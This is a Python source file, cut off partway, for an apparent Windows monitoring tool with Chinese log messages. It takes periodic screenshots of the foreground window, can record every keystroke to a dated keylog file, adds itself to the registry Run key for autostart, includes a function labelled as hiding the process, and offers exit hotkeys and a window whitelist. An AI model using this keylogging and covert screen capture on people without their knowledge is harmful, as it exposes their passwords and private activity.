import
os
import
sys
import
time
import
gc
import
json
import
logging
import
queue
import
threading
import
traceback
from
datetime
import
datetime
import
ctypes
from
ctypes
import
Structure, windll, c_long, c_int, c_uint
import
argparse
import
psutil
import
win32api
import
win32con
import
win32gui
import
win32process
import
win32security
import
winreg
from
PIL
import
ImageGrab
from
pynput
import
keyboard
from
concurrent.futures
import
ThreadPoolExecutor
class POINT(Structure):
    """ctypes structure with two C ``long`` members, ``x`` and ``y``."""

    _fields_ = [(axis, c_long) for axis in ("x", "y")]
class MSG(Structure):
    """ctypes mirror of the Win32 ``MSG`` record used with ``PeekMessageW``.

    The members use pointer-sized types where the Win32 definition does
    (HWND, WPARAM, LPARAM).  Declaring them all as 32-bit ``c_int`` shifts
    the ``message`` member and makes the buffer too small on 64-bit Windows.
    """

    _fields_ = [
        ("hwnd", ctypes.c_void_p),      # HWND
        ("message", c_uint),            # UINT
        ("wParam", ctypes.c_size_t),    # WPARAM (unsigned, pointer sized)
        ("lParam", ctypes.c_ssize_t),   # LPARAM (signed, pointer sized)
        ("time", c_uint),               # DWORD
        ("pt", POINT),
    ]
# Handle to the Win32 user32 library, obtained through ctypes (Windows only).
user32 = ctypes.windll.user32
# Modifier flags; MOD_CONTROL | MOD_ALT is what this file passes to RegisterHotKey.
MOD_ALT = 1 << 0
MOD_CONTROL = 1 << 1
MOD_SHIFT = 1 << 2
MOD_WIN = 1 << 3

# Message id compared against MSG.message when polling for the hot key.
WM_HOTKEY = 0x312

# Process access-right masks; PROCESS_ALL_ACCESS is the one passed to OpenProcess.
PROCESS_VM_OPERATION = 1 << 3
PROCESS_VM_READ = 1 << 4
PROCESS_VM_WRITE = 1 << 5
PROCESS_QUERY_INFORMATION = 1 << 10
PROCESS_ALL_ACCESS = 0x1F0FFF
# Shared two-thread worker pool.
executor = ThreadPoolExecutor(2)

# Set once the program has been asked to exit; polled by the worker loops.
exit_event = threading.Event()

# Normalised keys currently held down, maintained by the keyboard listener.
GLOBAL_KEYS_PRESSED = set()
KEY_MONITORING_ACTIVE = True

# Snapshots of GLOBAL_KEYS_PRESSED taken around each screenshot.
KEYBOARD_STATE_BEFORE_SCREENSHOT = KEYBOARD_STATE_AFTER_SCREENSHOT = None

IS_TAKING_SCREENSHOT = False
KEYBOARD_MONITORING_SUSPENDED = False
# Exit hot-key combinations: each entry has a display name and the set of
# normalised pynput keys that must all be held down.
HOT_KEY_COMBINATIONS = [
    dict(
        name="Ctrl+Alt+X",
        keys={keyboard.Key.ctrl, keyboard.Key.alt, keyboard.KeyCode.from_char('x')},
    ),
    dict(
        name="Alt+X",
        keys={keyboard.Key.alt, keyboard.KeyCode.from_char('x')},
    ),
    dict(
        name="Ctrl+Alt+Q",
        keys={keyboard.Key.ctrl, keyboard.Key.alt, keyboard.KeyCode.from_char('q')},
    ),
    dict(
        name="Ctrl+Alt+W",
        keys={keyboard.Key.ctrl, keyboard.Key.alt, keyboard.KeyCode.from_char('w')},
    ),
    dict(
        name="Alt+Shift+X",
        keys={keyboard.Key.alt, keyboard.Key.shift, keyboard.KeyCode.from_char('x')},
    ),
]

# The combination currently selected; starts as the first entry.
CURRENT_HOTKEY_COMBO = HOT_KEY_COMBINATIONS[0]
# Active pynput listener used for exit hot-key detection (None until started).
KEY_LISTENER = None

# Defaults; main() overwrites these from the command line and config file.
SLEEP_TIME = 15                    # seconds between screenshots
SAVE_PATH = "screenshots"
white_list = list()                # window titles that are skipped
KEYLOGGER_ENABLED = False
KEYLOGGER_RESPECT_WHITELIST = True
MEMORY_OPTIMIZE_INTERVAL = 5 * 60  # seconds between optimize_memory() calls
def log_error(msg, exc=None):
    """Log ``msg`` at ERROR level, followed by a traceback when ``exc`` is given.

    Args:
        msg: Text to log.
        exc: Optional exception.  When it is an exception instance, its own
            traceback is logged, so the call also works outside the
            ``except`` block that caught it.  Any other truthy value falls
            back to the traceback of the exception currently being handled.
    """
    logging.error(msg)
    if not exc:
        return
    if isinstance(exc, BaseException):
        details = "".join(
            traceback.format_exception(type(exc), exc, exc.__traceback__)
        )
    else:
        details = traceback.format_exc()
    logging.error(details)
def _normalize_key(key):
    """Return the canonical form of a pynput key for the pressed-key set.

    Left/right variants of Ctrl, Alt and Shift collapse to the generic
    modifier, and character keys are lower-cased.  Press and release must
    share this mapping so a key added on press is removed on release.
    """
    if key in (keyboard.Key.ctrl, keyboard.Key.ctrl_l, keyboard.Key.ctrl_r):
        return keyboard.Key.ctrl
    if key in (keyboard.Key.alt, keyboard.Key.alt_l, keyboard.Key.alt_r):
        return keyboard.Key.alt
    if key in (keyboard.Key.shift, keyboard.Key.shift_l, keyboard.Key.shift_r):
        return keyboard.Key.shift
    char = getattr(key, 'char', None)
    if char:
        return keyboard.KeyCode.from_char(char.lower())
    return key


def process_key(key, global_keys, prefix=""):
    """Record a key press and trigger the exit handler on a known hot key.

    Args:
        key: Key object delivered by the pynput listener.
        global_keys: Mutable set of currently pressed (normalised) keys.
        prefix: Text prepended to log messages.

    Returns:
        False when an exit combination was detected (which makes a pynput
        listener stop), True otherwise, including after an internal error.
    """
    try:
        global_keys.add(_normalize_key(key))

        # Ctrl+Alt+X always works, even if the combination table was edited.
        candidates = [{
            "name": "Ctrl+Alt+X",
            "keys": {keyboard.Key.ctrl, keyboard.Key.alt,
                     keyboard.KeyCode.from_char('x')},
        }]
        candidates.extend(HOT_KEY_COMBINATIONS)
        # The selected combo may be a custom one that is not in the table.
        if CURRENT_HOTKEY_COMBO and CURRENT_HOTKEY_COMBO not in candidates:
            candidates.append(CURRENT_HOTKEY_COMBO)

        for combo in candidates:
            if all(k in global_keys for k in combo["keys"]):
                logging.info(f"{prefix} 检测到热键组合: {combo['name']}")
                handle_exit_hotkey()
                return False
    except Exception as e:
        log_error(f"{prefix} 按键处理出错: {str(e)}", e)
    return True


def remove_key(key, global_keys, prefix=""):
    """Remove a released key from the pressed-key set.

    Args:
        key: Key object delivered by the pynput listener.
        global_keys: Mutable set of currently pressed (normalised) keys.
        prefix: Text prepended to log messages.

    Returns:
        Always True, so the listener keeps running.
    """
    try:
        global_keys.discard(_normalize_key(key))
    except Exception as e:
        log_error(f"{prefix} 按键释放处理出错: {str(e)}", e)
    return True
def check_for_key_combination():
    """Check whether the currently selected exit combination is held down.

    Works on a snapshot of ``GLOBAL_KEYS_PRESSED`` because the listener
    thread mutates that set concurrently, and iterating a set while it
    changes size raises ``RuntimeError``.

    Returns:
        True if the combination was detected (the exit handler has been
        invoked), False otherwise or when no combination is selected.
    """
    combo = CURRENT_HOTKEY_COMBO
    if not combo:
        return False

    pressed = set(GLOBAL_KEYS_PRESSED)
    lowercase_keys = {
        keyboard.KeyCode.from_char(k.char.lower())
        if hasattr(k, 'char') and k.char else k
        for k in pressed
    }
    if combo["keys"].issubset(lowercase_keys):
        logging.info(f"[热键监控] 检测到热键组合: {combo['name']}")
        logging.info(f"[热键监控] 当前按下的键: {pressed}")
        handle_exit_hotkey()
        return True
    return False
def handle_exit_hotkey():
    """Signal shutdown and force the process to end half a second later.

    Sets ``exit_event`` so cooperative loops can stop, runs a garbage
    collection, then starts a daemon thread that sleeps 0.5 s and calls
    ``os._exit(0)``.
    """
    def _terminate_after_grace():
        time.sleep(0.5)
        os._exit(0)

    logging.info("[热键事件] 退出热键被触发,程序即将退出")
    exit_event.set()
    gc.collect()
    terminator = threading.Thread(target=_terminate_after_grace, daemon=True)
    terminator.start()
def start_keyboard_monitor():
    """(Re)start the global pynput listener that watches for exit hot keys.

    A previously started listener is stopped and joined first.  Key presses
    are ignored while ``IS_TAKING_SCREENSHOT`` is set.

    Returns:
        True if the listener was started, False if starting it failed.
    """
    global KEY_LISTENER, KEY_MONITORING_ACTIVE

    tag = "[键盘监控]"

    def _pressed(key):
        return True if IS_TAKING_SCREENSHOT else process_key(key, GLOBAL_KEYS_PRESSED, tag)

    def _released(key):
        return remove_key(key, GLOBAL_KEYS_PRESSED, tag)

    try:
        logging.info("[键盘监控] 启动键盘监听器")
        KEY_MONITORING_ACTIVE = True

        previous = KEY_LISTENER
        if previous:
            try:
                previous.stop()
                previous.join()
            except Exception as e:
                logging.debug(f"[键盘监控] 停止之前的监听器失败: {str(e)}")

        KEY_LISTENER = keyboard.Listener(
            on_press=_pressed,
            on_release=_released,
            suppress=False,
        )
        KEY_LISTENER.daemon = True
        KEY_LISTENER.start()
        logging.info("[键盘监控] 键盘监听器已启动")
    except Exception as e:
        log_error(f"[键盘监控] 启动键盘监听失败: {str(e)}", e)
        return False
    else:
        return True
def stop_keyboard_monitor():
    """Stop the global hot-key listener, if one is running.

    Returns:
        True on success, False if stopping the listener raised.
    """
    global KEY_LISTENER, KEY_MONITORING_ACTIVE
    try:
        logging.info("[键盘监控] 停止键盘监听器")
        KEY_MONITORING_ACTIVE = False
        active = KEY_LISTENER
        if active:
            active.stop()
            KEY_LISTENER = None
        logging.info("[键盘监控] 键盘监听器已停止")
    except Exception as e:
        log_error(f"[键盘监控] 停止键盘监听失败: {str(e)}")
        return False
    else:
        return True
def get_app_path():
    """Return the application directory and make sure ``config/`` exists in it.

    The directory is that of ``sys.executable`` when ``sys.frozen`` is set,
    otherwise that of this source file.
    """
    is_frozen = getattr(sys, 'frozen', False)
    anchor = sys.executable if is_frozen else os.path.abspath(__file__)
    app_path = os.path.dirname(anchor)
    os.makedirs(os.path.join(app_path, 'config'), exist_ok=True)
    return app_path
def setup_logging(save_path):
    """Route root-logger output to ``<save_path>/<YYYY-MM-DD>/screenshot.log`` and stdout.

    Existing root handlers are removed *and closed*, so calling this more
    than once does not leak open log files.  A UTF-8 byte-order mark is
    written when the log file is new or empty.

    Args:
        save_path: Base directory; the dated sub-directory is created.
    """
    log_dir = os.path.join(save_path, datetime.now().strftime('%Y-%m-%d'))
    os.makedirs(log_dir, exist_ok=True)
    log_path = os.path.join(log_dir, 'screenshot.log')

    for handler in logging.root.handlers[:]:
        logging.root.removeHandler(handler)
        try:
            handler.close()
        except OSError:
            # Flushing a dead stream may fail; the handler is detached anyway.
            pass

    # Write the BOM before the handler opens the file in append mode.
    if not os.path.exists(log_path) or os.path.getsize(log_path) == 0:
        with open(log_path, 'w', encoding='utf-8') as f:
            f.write('\ufeff')

    formatter = logging.Formatter(
        '%(asctime)s - %(message)s', datefmt='%Y-%m-%d %H:%M:%S'
    )
    file_handler = logging.FileHandler(log_path, encoding='utf-8', mode='a')
    console_handler = logging.StreamHandler(sys.stdout)
    file_handler.setFormatter(formatter)
    console_handler.setFormatter(formatter)

    logging.root.setLevel(logging.INFO)
    logging.root.addHandler(file_handler)
    logging.root.addHandler(console_handler)
def get_keylog_file(save_path):
    """Return ``<save_path>/<YYYY-MM-DD>/keylog.txt``, creating the directory.

    If the dated directory cannot be built or created, the error is logged
    and ``keylog.txt`` in the current working directory is returned.
    """
    filename = 'keylog.txt'
    try:
        day_dir = os.path.join(save_path, datetime.now().strftime('%Y-%m-%d'))
        os.makedirs(day_dir, exist_ok=True)
        return os.path.join(day_dir, filename)
    except Exception as e:
        logging.error(f"获取键盘记录文件路径失败: {str(e)}")
    return os.path.join(os.getcwd(), filename)
def hide_process():
    """Lower the current process to the below-normal priority class.

    Despite the name and the log message, nothing here hides the process;
    the only effect is the priority change.  Failures are logged and
    otherwise ignored.
    """
    try:
        pid = win32api.GetCurrentProcessId()
        proc_handle = win32api.OpenProcess(PROCESS_ALL_ACCESS, False, pid)
        win32process.SetPriorityClass(
            proc_handle, win32process.BELOW_NORMAL_PRIORITY_CLASS
        )
        win32api.CloseHandle(proc_handle)
        logging.info("进程已隐藏")
    except Exception as e:
        logging.error(f"隐藏进程失败: {str(e)}")
def optimize_memory():
    """Run a garbage collection and re-apply below-normal process priority.

    Errors are logged through ``log_error`` and not propagated.
    """
    try:
        gc.collect()
        psutil.Process().nice(psutil.BELOW_NORMAL_PRIORITY_CLASS)
        logging.info("内存已优化")
    except Exception as e:
        log_error(f"内存优化失败: {str(e)}")
def is_white_window_open():
    """Tell whether the foreground window is a visible, non-minimised whitelist window.

    The window title must be an exact member of ``white_list``.

    Returns:
        True when the foreground window matches, False otherwise.
    """
    hwnd = win32gui.GetForegroundWindow()
    active_title = win32gui.GetWindowText(hwnd)

    # Short-circuiting keeps the Win32 calls in the original order.
    if (
        active_title in white_list
        and win32gui.IsWindowVisible(hwnd)
        and win32gui.GetWindowPlacement(hwnd)[1] != win32con.SW_SHOWMINIMIZED
    ):
        logging.debug(f"检测到活动的白名单窗口: {active_title}")
        return True

    logging.debug(f"当前活动窗口不在白名单中: {active_title}")
    return False
def add_to_startup(config=None):
    """Write a ``PCMonitor`` value under the current user's ``Run`` registry key.

    Does nothing except log when ``config`` is missing or its
    ``auto_start`` entry is falsy.  The value is the quoted executable path
    when ``sys.frozen`` is set, otherwise ``pythonw "<this file>"``.

    Args:
        config: Configuration mapping, or None.
    """
    try:
        enabled = config and config.get('auto_start', False)
        if not enabled:
            logging.info("开机自启动已禁用")
            return

        run_key_path = r"Software\Microsoft\Windows\CurrentVersion\Run"
        run_key = winreg.OpenKey(
            winreg.HKEY_CURRENT_USER, run_key_path, 0, winreg.KEY_ALL_ACCESS
        )
        if getattr(sys, 'frozen', False):
            command = f'"{sys.executable}"'
        else:
            command = f'pythonw "{os.path.abspath(__file__)}"'
        winreg.SetValueEx(run_key, "PCMonitor", 0, winreg.REG_SZ, command)
        winreg.CloseKey(run_key)
        logging.info("已添加到开机自启动")
    except Exception as e:
        log_error(f"添加开机自启动失败: {str(e)}")
def get_active_window_info():
    """Return the title text of the current foreground window."""
    return win32gui.GetWindowText(win32gui.GetForegroundWindow())
def keylogger_on_key_press(key, save_path, respect_whitelist):
    """Append one timestamped line for ``key`` to the day's key-log file.

    Args:
        key: Key object passed by the pynput listener.
        save_path: Base directory handed to ``get_keylog_file``.
        respect_whitelist: When true, nothing is written while
            ``is_white_window_open()`` reports a whitelisted window.

    Errors are logged through ``log_error`` and never propagated.
    """
    try:
        # Skip recording while a whitelisted window is in the foreground.
        if respect_whitelist and is_white_window_open():
            return
        current_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        try:
            # Objects with a ``char`` attribute log it; others log str(key).
            char = key.char if hasattr(key, 'char') else str(key)
            with open(get_keylog_file(save_path), 'a', encoding='utf-8') as f:
                f.write(f"{current_time} - {char}\n")
        except Exception as e:
            log_error(f"记录按键失败: {str(e)}")
    except Exception as e:
        log_error(f"键盘处理错误: {str(e)}")
def keylogger_on_key_release(key, save_path, respect_whitelist):
    """Key-release hook; intentionally does nothing."""
    pass
def start_keylogger(save_path, respect_whitelist):
    """Start the key-logging listener when ``KEYLOGGER_ENABLED`` is set.

    Args:
        save_path: Base directory for the log; the current working
            directory is used (with a warning) when it is empty.
        respect_whitelist: Forwarded to ``keylogger_on_key_press``.

    Returns:
        The started ``keyboard.Listener``, or None when key logging is
        disabled.
    """
    if KEYLOGGER_ENABLED:
        logging.info("键盘记录功能已启动")
        if not save_path:
            save_path = os.getcwd()
            logging.warning(f"save_path未设置,使用当前目录: {save_path}")
        keylog_file = get_keylog_file(save_path)
        # A new log file starts with a UTF-8 byte-order mark.
        if not os.path.exists(keylog_file):
            with open(keylog_file, 'w', encoding='utf-8') as f:
                f.write('\ufeff')

        def on_press(key):
            keylogger_on_key_press(key, save_path, respect_whitelist)

        def on_release(key):
            pass

        keyboard_listener = keyboard.Listener(on_press=on_press, on_release=on_release)
        keyboard_listener.start()
        return keyboard_listener
    return None
def show_startup_message(config=None, hkey_manager=None):
    """Log a summary of the effective configuration at start-up.

    Args:
        config: Configuration mapping (only ``auto_start`` is read), or None.
        hkey_manager: Object whose ``current_hotkey`` attribute, if set, is
            reported as the exit hot key.
    """
    if KEYLOGGER_ENABLED:
        keylog_status = '已启用'
        keylog_details = f",键盘记录路径: {get_keylog_file(SAVE_PATH)}"
    else:
        keylog_status = '已禁用'
        keylog_details = ",使用 --keylog 参数启用键盘记录"

    if config and config.get('auto_start', False):
        auto_start_status = '已启用'
        auto_start_details = ""
    else:
        auto_start_status = '已禁用'
        auto_start_details = ",在config.json中设置auto_start为true启用"

    configured = hkey_manager and getattr(hkey_manager, 'current_hotkey', None)
    current_hotkey = configured if configured else "未知"

    summary = (
        "电脑监控程序已启动 - 配置信息:",
        f"保存路径: {SAVE_PATH}",
        f"截图间隔: {SLEEP_TIME}秒",
        f"退出快捷键: {current_hotkey}",
        f"白名单应用: {', '.join(white_list)}",
        f"键盘记录: {keylog_status}{keylog_details}",
        f"开机自启动: {auto_start_status}{auto_start_details}",
    )
    for line in summary:
        logging.info(line)
def show_hotkey_conflict_message():
    """Log the hot-key conflict, log the troubleshooting steps, and exit.

    The troubleshooting text used to be assembled and then discarded; it is
    now written to the log, one step per line.

    Raises:
        SystemExit: always, with exit code 1.
    """
    guidance = (
        "请尝试以下操作:",
        "1. 检查是否有其他监控程序正在运行",
        "2. 检查任务管理器中是否有本程序的其他实例",
        "3. 重新启动本程序",
        "4. 如果问题仍然存在,请重启电脑",
    )
    logging.error("热键冲突:所有退出热键组合都已被其他程序占用")
    for line in guidance:
        logging.error(line)
    logging.error("程序将退出")
    sys.exit(1)
def is_admin():
    """Return True when ``shell32.IsUserAnAdmin`` reports administrator rights.

    Returns:
        A real ``bool``.  False is also returned when the check cannot be
        performed (for example when ``ctypes.windll`` is unavailable).
    """
    try:
        return bool(ctypes.windll.shell32.IsUserAnAdmin())
    except Exception:
        # Not a bare except: KeyboardInterrupt/SystemExit must pass through.
        return False
def run_as_admin():
    """Ask Windows to relaunch this program elevated (``runas`` verb).

    ``ShellExecuteW`` takes the program and its parameters separately, so
    the parameter string must not repeat the executable.  For a ``.py``
    script it is the quoted script path followed by the original
    arguments; for other launches it is the original arguments alone.

    Errors are logged and not propagated.
    """
    try:
        import subprocess

        # list2cmdline quotes arguments that contain spaces or quotes.
        extra_args = subprocess.list2cmdline(sys.argv[1:])
        if sys.argv[0].endswith('.py'):
            script_path = os.path.abspath(sys.argv[0])
            params = f'"{script_path}" {extra_args}'.strip()
        else:
            params = extra_args

        result = ctypes.windll.shell32.ShellExecuteW(
            None,
            "runas",
            sys.executable,
            params or None,
            None,
            1,
        )
        # ShellExecuteW reports success with a value greater than 32.
        if result > 32:
            logging.info("请求管理员权限重新运行程序")
        else:
            log_error(f"请求管理员权限失败: ShellExecuteW 返回 {result}")
    except Exception as e:
        log_error(f"请求管理员权限失败: {str(e)}")
def check_hotkey_available():
    """Probe whether Ctrl+Alt+X can be registered as a system-wide hot key.

    A temporary window is created, the hot key is registered on it and
    immediately released, and every temporary resource is cleaned up.

    Returns:
        False only when registration fails with error 1409 (hot key already
        registered).  True when the hot key is free, and also when the
        probe itself could not be carried out.
    """
    hotkey_already_registered = 1409
    hwnd = None
    wc = None
    user32 = None
    try:
        # use_last_error makes ctypes keep the error code of each call so it
        # can be read reliably with ctypes.get_last_error().
        user32 = ctypes.WinDLL("user32", use_last_error=True)

        wc = win32gui.WNDCLASS()
        wc.lpfnWndProc = (
            lambda h, msg, wparam, lparam: win32gui.DefWindowProc(h, msg, wparam, lparam)
        )
        wc.lpszClassName = "TempHotKeyWindow"
        wc.hInstance = win32api.GetModuleHandle(None)
        try:
            win32gui.RegisterClass(wc)
        except Exception:
            # The class may be left over from an earlier probe; retry once.
            try:
                win32gui.UnregisterClass(wc.lpszClassName, wc.hInstance)
                win32gui.RegisterClass(wc)
            except Exception as e:
                log_error(f"注册窗口类失败: {str(e)}")
                return True

        hwnd = win32gui.CreateWindow(
            wc.lpszClassName,
            None,
            win32con.WS_OVERLAPPED,
            0, 0, 0, 0,
            0,
            0,
            wc.hInstance,
            None,
        )
        if not hwnd:
            log_error("创建临时窗口失败")
            return True

        try:
            handle = ctypes.c_void_p(hwnd)
            # Clear any stale registration of this id on the window.
            user32.UnregisterHotKey(handle, 1)
            time.sleep(0.1)
            if user32.RegisterHotKey(handle, 1, MOD_CONTROL | MOD_ALT, ord('X')):
                return True  # released again in the finally block
            error_code = ctypes.get_last_error()
            if error_code == hotkey_already_registered:
                logging.warning(f"热键已被其他程序注册 (错误代码: {error_code})")
                return False
            log_error(f"注册热键失败,错误代码: {error_code}")
            return True
        except Exception as e:
            log_error(f"注册热键时发生异常: {str(e)}", e)
            return True
    except Exception as e:
        log_error(f"检查热键可用性时发生异常: {str(e)}", e)
        return True
    finally:
        # Best-effort cleanup.  There is deliberately no ``return`` here: a
        # return inside ``finally`` would override the results above.
        if hwnd:
            try:
                if user32 is not None:
                    user32.UnregisterHotKey(ctypes.c_void_p(hwnd), 1)
            except Exception as e:
                logging.debug(f"UnregisterHotKey cleanup failed: {e}")
            try:
                win32gui.DestroyWindow(hwnd)
            except Exception as e:
                logging.debug(f"DestroyWindow cleanup failed: {e}")
        if wc:
            try:
                win32gui.UnregisterClass(wc.lpszClassName, wc.hInstance)
            except Exception as e:
                logging.debug(f"UnregisterClass cleanup failed: {e}")
        gc.collect()
def run_main_loop(screenshot_manager):
    """Run the periodic scheduler until ``exit_event`` is set.

    Every pass (about 0.1 s apart) it logs a heartbeat every 10 s, queues a
    screenshot every ``SLEEP_TIME`` seconds unless the foreground window
    title is in ``white_list``, and calls ``optimize_memory`` every
    ``MEMORY_OPTIMIZE_INTERVAL`` seconds.

    Args:
        screenshot_manager: Object providing ``add_task(title, save_dir)``.
    """
    def _queue_screenshot(title):
        # Screenshots are grouped into one directory per calendar day.
        day_dir = os.path.join(SAVE_PATH, datetime.now().strftime('%Y-%m-%d'))
        os.makedirs(day_dir, exist_ok=True)
        logging.info(f"添加截图任务: {title}")
        screenshot_manager.add_task(title, day_dir)

    logging.info("主循环开始运行")
    optimized_at = time.time()
    captured_at = time.time()
    screenshot_count = 0
    heartbeat_at = time.time()
    try:
        while True:
            try:
                now = time.time()
                if now - heartbeat_at >= 10:
                    logging.info(f"程序运行中 - 已截图: {screenshot_count}张")
                    heartbeat_at = now

                if exit_event.is_set():
                    logging.info("检测到退出事件,准备退出程序")
                    break

                now = time.time()
                if now - captured_at >= SLEEP_TIME:
                    active_title = get_active_window_info()
                    logging.info(f"当前活动窗口: {active_title}")
                    if active_title in white_list:
                        logging.info(f"窗口在白名单中,跳过截图: {active_title}")
                    else:
                        _queue_screenshot(active_title)
                        screenshot_count += 1
                        logging.info(f"截图数量: {screenshot_count}")
                    captured_at = now

                if now - optimized_at >= MEMORY_OPTIMIZE_INTERVAL:
                    logging.info("执行内存优化")
                    optimize_memory()
                    optimized_at = now

                time.sleep(0.1)
            except Exception as e:
                log_error(f"主循环错误: {str(e)}", e)
                time.sleep(0.5)
    except KeyboardInterrupt:
        logging.info("接收到键盘中断,准备退出")
    finally:
        logging.info("主循环结束")
def cleanup_resources(screenshot_manager, hotkey_manager, keyboard_listener, backup_hotkey_hwnd):
    """Stop every running component and release the backup hot key.

    Each component is stopped in its own ``try`` block, so a failure in one
    no longer prevents the remaining ones from being cleaned up.

    Args:
        screenshot_manager: Object with ``stop()``, or None.
        hotkey_manager: Object with ``stop()``, or None.
        keyboard_listener: Listener with ``stop()``, or None.
        backup_hotkey_hwnd: Either a ``keyboard.Listener`` or a window
            handle on which hot-key id 1 was registered, or None.
    """
    exit_event.set()
    logging.info("正在清理资源...")

    for component in (screenshot_manager, hotkey_manager, keyboard_listener):
        if not component:
            continue
        try:
            component.stop()
        except Exception as e:
            log_error(f"清理资源时发生错误: {str(e)}")

    if backup_hotkey_hwnd:
        try:
            if isinstance(backup_hotkey_hwnd, keyboard.Listener):
                backup_hotkey_hwnd.stop()
                logging.info("[备用热键] 备用热键监听器已停止")
            else:
                ctypes.windll.user32.UnregisterHotKey(backup_hotkey_hwnd, 1)
                # The window may already have been destroyed by its owner.
                if win32gui.IsWindow(backup_hotkey_hwnd):
                    win32gui.DestroyWindow(backup_hotkey_hwnd)
                logging.info("[备用热键] 备用热键资源已清理")
        except Exception as e:
            log_error(f"[备用热键] 清理备用热键资源失败: {str(e)}")

    logging.info("服务已停止")
    gc.collect()
class HotkeyManager:
    """Select the exit hot key and keep the keyboard listener alive.

    ``available_hotkeys`` is an ordered list of ``{"name", "keys"}``
    entries; the first entry is the one that gets selected.  Custom hot
    keys and the preferred hot key come from ``config_manager.config``.
    """

    def __init__(self, config_manager=None):
        """Build the default combination list and apply the configuration.

        Args:
            config_manager: Object exposing a ``config`` mapping and
                ``set_preferred_hotkey(name)``, or None.
        """
        self.config_manager = config_manager
        self.current_hotkey = None
        self.running = False
        self.key_monitor_thread = None
        self.available_hotkeys = [
            {"name": "Ctrl+Alt+X",
             "keys": {keyboard.Key.ctrl, keyboard.Key.alt, keyboard.KeyCode.from_char('x')}},
            {"name": "Alt+X",
             "keys": {keyboard.Key.alt, keyboard.KeyCode.from_char('x')}},
            {"name": "Ctrl+Alt+Q",
             "keys": {keyboard.Key.ctrl, keyboard.Key.alt, keyboard.KeyCode.from_char('q')}},
            {"name": "Ctrl+Alt+W",
             "keys": {keyboard.Key.ctrl, keyboard.Key.alt, keyboard.KeyCode.from_char('w')}},
            {"name": "Alt+Shift+X",
             "keys": {keyboard.Key.alt, keyboard.Key.shift, keyboard.KeyCode.from_char('x')}},
        ]
        self._load_custom_hotkeys()

    def _load_custom_hotkeys(self):
        """Prepend valid ``custom_hotkeys`` entries, then apply the preferred one.

        The preferred hot key is applied even when no custom hot keys are
        configured; previously the early return skipped it in that case.
        """
        if not self.config_manager or not self.config_manager.config:
            return

        custom_hotkeys = self.config_manager.config.get("custom_hotkeys", [])
        for hotkey in custom_hotkeys or []:
            if not isinstance(hotkey, dict) or "name" not in hotkey:
                continue
            try:
                key_set = self._parse_hotkey_string(hotkey["name"])
                if key_set:
                    self.available_hotkeys.insert(0, {"name": hotkey["name"], "keys": key_set})
            except Exception as e:
                log_error(f"[热键管理] 解析自定义热键失败: {hotkey['name']}, 错误: {str(e)}")

        self._set_preferred_hotkey_priority()

    def _parse_hotkey_string(self, hotkey_str):
        """Turn a name such as ``"Ctrl+Alt+X"`` into a set of pynput keys.

        Args:
            hotkey_str: Modifiers (``ctrl``/``alt``/``shift``/``win``)
                joined with ``+`` and followed by one character.

        Returns:
            The key set, or an empty set when a modifier is unknown or the
            final key is not a single character.  Returning only the
            modifiers in that case would make e.g. plain Ctrl+Alt an exit
            hot key.
        """
        modifiers = {
            "ctrl": keyboard.Key.ctrl,
            "alt": keyboard.Key.alt,
            "shift": keyboard.Key.shift,
            "win": keyboard.Key.cmd,
        }
        name_parts = hotkey_str.split('+')
        main_key = name_parts[-1].strip().lower()
        if len(main_key) != 1:
            return set()

        key_set = set()
        for part in name_parts[:-1]:
            modifier = modifiers.get(part.strip().lower())
            if modifier is None:
                return set()
            key_set.add(modifier)
        key_set.add(keyboard.KeyCode.from_char(main_key))
        return key_set

    def _set_preferred_hotkey_priority(self):
        """Move the configured ``preferred_hotkey`` entry to the front of the list."""
        if not self.config_manager or not self.config_manager.config:
            return
        preferred_hotkey = self.config_manager.config.get("preferred_hotkey", "")
        if preferred_hotkey:
            for i, hotkey in enumerate(self.available_hotkeys):
                if hotkey["name"] == preferred_hotkey:
                    self.available_hotkeys.insert(0, self.available_hotkeys.pop(i))
                    break

    def start(self):
        """Select a hot key, start the listener and its watchdog thread.

        Returns:
            True when started, False when no hot key could be selected.
        """
        global CURRENT_HOTKEY_COMBO
        logging.info("[热键管理] 开始初始化热键管理器")
        if not self.check_hotkey_available():
            log_error("[热键管理] 没有可用的热键组合")
            return False

        CURRENT_HOTKEY_COMBO = next(
            (combo for combo in self.available_hotkeys
             if combo["name"] == self.current_hotkey),
            None,
        )
        self.running = True
        start_keyboard_monitor()
        logging.info(f"[热键管理] 热键管理器已启动,当前热键: {self.current_hotkey}")

        if self.config_manager and self.current_hotkey:
            self.config_manager.set_preferred_hotkey(self.current_hotkey)

        self.key_monitor_thread = threading.Thread(
            target=self._monitor_keyboard_listener, daemon=True
        )
        self.key_monitor_thread.start()
        return True

    def check_hotkey_available(self):
        """Select the first entry of ``available_hotkeys`` as the current hot key.

        Returns:
            True when an entry was selected, False when the list is empty
            or an error occurred.
        """
        try:
            logging.info("[热键管理] 开始检查可用热键组合")
            if not self.available_hotkeys:
                log_error("[热键管理] 没有定义热键组合")
                return False
            self.current_hotkey = self.available_hotkeys[0]["name"]
            logging.info(f"[热键管理] 选择热键: {self.current_hotkey}")
            return True
        except Exception as e:
            log_error(f"[热键管理] 检查热键可用性失败: {str(e)}", e)
            return False

    def _monitor_keyboard_listener(self):
        """Watchdog loop: restart the listener whenever it is found dead.

        NOTE(review): the original indentation of this method was lost; the
        three checks below are reconstructed as siblings inside the loop.
        Confirm against the upstream source.
        """
        retry_count = 0
        while self.running and not exit_event.is_set():
            try:
                if KEY_LISTENER is None or not KEY_LISTENER.is_alive():
                    retry_count += 1
                    logging.warning(f"[热键管理] 键盘监听器已停止,尝试重启 ({retry_count})")
                    start_keyboard_monitor()

                # After repeated restarts, also poll the pressed-key set directly.
                if retry_count >= 5:
                    check_for_key_combination()

                if retry_count % 10 == 0 and retry_count > 0:
                    logging.info(f"[热键管理] 热键状态: 已设置={self.current_hotkey}, 监听器活跃={KEY_LISTENER and KEY_LISTENER.is_alive()}")
                    retry_count = 0

                time.sleep(0.5)
            except Exception as e:
                log_error(f"[热键管理] 监控键盘监听器时出错: {str(e)}", e)
                time.sleep(1)

    def stop(self):
        """Stop the listener and wait up to one second for the watchdog thread."""
        logging.info("[热键管理] 正在停止热键管理器")
        self.running = False
        stop_keyboard_monitor()
        if self.key_monitor_thread and self.key_monitor_thread.is_alive():
            try:
                self.key_monitor_thread.join(timeout=1.0)
            except Exception as e:
                log_error(f"[热键管理] 停止监控线程失败: {str(e)}")
        logging.info("[热键管理] 热键管理器已停止")
class ConfigManager:
    """Load, hold and persist the JSON configuration file.

